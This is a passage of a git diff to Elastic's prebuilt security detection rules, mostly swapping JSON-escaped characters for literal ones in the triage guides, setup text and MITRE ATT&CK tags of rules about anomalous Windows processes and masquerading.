persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -49,7 +49,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json index 73ccdbbcf00..17fbc3011cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_104.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -48,7 +48,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json index 52b49a273ad..beb7c67f85e 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json @@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], @@ -43,7 +43,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -58,7 +58,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json index e1868f68d29..16c80247bb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json index c2bd2f46a1e..4802c2f1123 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json index 000de267d57..1e194dad0f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json index 0d5d2b65cae..23e020a4056 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json index 4bb32a90492..0d818b33ffa 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json index 2a9a7a563e6..ed4be6d6e05 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json index f281b0fb275..504d54c0b5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json index b4c33808416..ea544b8f50e 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json index 1d77f11b042..4ebf2348513 100644 --- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json +++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json index 45d5ecfaaee..2eaf4e7234a 100644 --- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process 